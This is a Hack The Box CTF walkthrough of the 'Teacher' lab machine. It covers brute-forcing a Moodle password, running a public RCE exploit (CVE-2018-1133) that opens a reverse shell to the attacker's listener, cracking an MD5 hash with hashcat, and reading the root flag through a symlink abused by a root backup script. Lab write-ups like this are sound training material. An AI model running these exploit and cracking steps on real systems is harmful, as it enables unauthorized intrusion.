/var/log $ cat "Hack The Box - Teacher Walkthrough"
2019-04-20 | hackthebox ctf
tl;dr
- Find partial credentials in a file named as image.
- Find the login form where those credentials can be used.
- Confirm the username.
- Burteforce the last character of the password.
- Find an exploit to get a reverse shell.
- Extract linux user password hash from SQL database.
- Crack the hash to get access to the user flag.
- Find a script being executed as root.
- Abuse the script to get the root flag.
Tools used: masscan, nmap, gobuster, crunch, burp, mysql, hashcat, pspy
Machine Info
Initial Recon
Searching for open ports with masscan
just shows port 80 open. Scanning it with nmap
gives us not much more information:
|
|
Own User
Initial Enumeration
As there’s only port 80 open, that is the only point to start. And this is what we find there:
When looking through the website we find something odd on the ‘Gallery’ site. A console output:
Viewing the source of http://10.10.10.153/gallery.html
we can find the responsible JavaScript:
Trying to open the image in the browser isn’t possible. But it’s there. Using curl
to get it gives us something very useful:
Now we know that there is a ‘Giovanni’ who has the password ‘Th4C00lTheachaX’. But he forgot what X was. So next we need to find a place where we can use this information.
Finding Moodle
Doing a gobuster
run we find the following directories:
|
|
/images
, fonts
, /css
and /js
gives us listings of of the files used for the website. /javascript
, /phpmyadmin
and /server-staus
aren’t directly accessible. This leaves /moodle
to explorer. And indeed there is another website:
Moodle is aa open-source learning management platform. You can find it here. Let’s see if we can confirm that ‘giovanni’ is a valid username by using the ‘Forgotten password’ function. First by trying one that will be definitely false:
The developers have thought about the possible misuse of that kind of function and only providing a very generic message to prevent username enumeration:
Trying ‘giovanni’ anyway leads to something unexpected:
Following the provided link for more information reveals an interesting fact: “This error is shown when the server fails to send the email to the requested email id containing details about how to reset the password. This is most likely a server issue.” So we can assume the username ‘giovanni’ is indeed valid.
Bruteforcing Giovanni’s Password
As we nearly know the complete password, bruteforcing the last missing character shouldn’t be to much of an effort. Therefore we create a custom password wordlist appending all printable characters to ‘Th4C00lTheacha’ (e.g. with crunch
). Then we use Burb Intruder (Sniper attack) and set the payload to our custom wordlist and let it run. As it turns out there is all kind of different output but one sticks out:
So let’s confirm that ‘Th4C00lTheacha#’ is the password for ‘giovanni’ by logging in:
Finding a Vulnerability and Exploitation
Giovanni does give th course ‘Algebra’ and apperently he want’s to do a quiz with his class tomorrow as he wrote a message to the admin:
Taking this as a hint while searching for possible vulnerabilities we find CVE-2018-1133. Moodle prior to 3.5.0 does have a RCE vulnerability in the quiz component for math formulas. Details about it can be found in Robin Peraglie’s post Evil Teacher: Code Injection in Moodle. And there’s also a working exploit titled Moodle v3.4.1 RCE Exploit from Darryn Ten available.
Let’s give it a shot and see if it works. For the exploit we need a valid course id. The id of ‘Algebra’ is 2. We start a listener and run the exploit with the command php moodleexploit.php url=http://10.10.10.153/moodle user=Giovanni pass=Th4C00lTheacha# ip=10.10.15.146 port=42424 course=2
and if everything goes well we have a shell:
Privilege Escalation to User Flag
Unfortunately ‘www-data’ has no permission for /home/giovanni
. This means we need to get the Linux password for user ‘giovanni’ (or root) to get to the user flag.
From the file /var/www/html/moodle/config.php
we can find the credentials for the MariaDB database:
|
|
Using the MaraiDB CLI tool mysql
to enumerate the contents of the database ‘moodle’ we can find a suspicious user (id = 1337) named ‘Giovannibak’:
hash-identifier
guesses that 7a860966115182402ed06375cf0a22af
is most likely a MD5 hash:
Cracking the hash using hashcat -m 0 -a 0 -o giovannibak.txt giovannibak.hash /usr/share/wordlists/rockyou.txt
we get expelled
.
After spawning an interactive shell we can su giovanni
using the password expelled
and get the user flag:
Own root
When observing what is going on in /home/giovanni/work/tmp
we see an archive created and the permissions change every minute. Using pspy
we find the script therefore (/usr/bin/backup.sh
) which is executed as root:
|
|
To obtain the root flag we simply create a symbolic link in /home/giovanni/work/courses
with ln -s /root/root.txt toor.txt
and wait for the script to be executed. Then we have the flag in /home/giovanni/work/tmp/courses/toor.txt:
|
|
Who want’s to know more about wildcard misuse: The articles Exploiting Wildcard for Privilege Escalation and Back To The Future: Unix Wildcards Gone Wild give a good overview.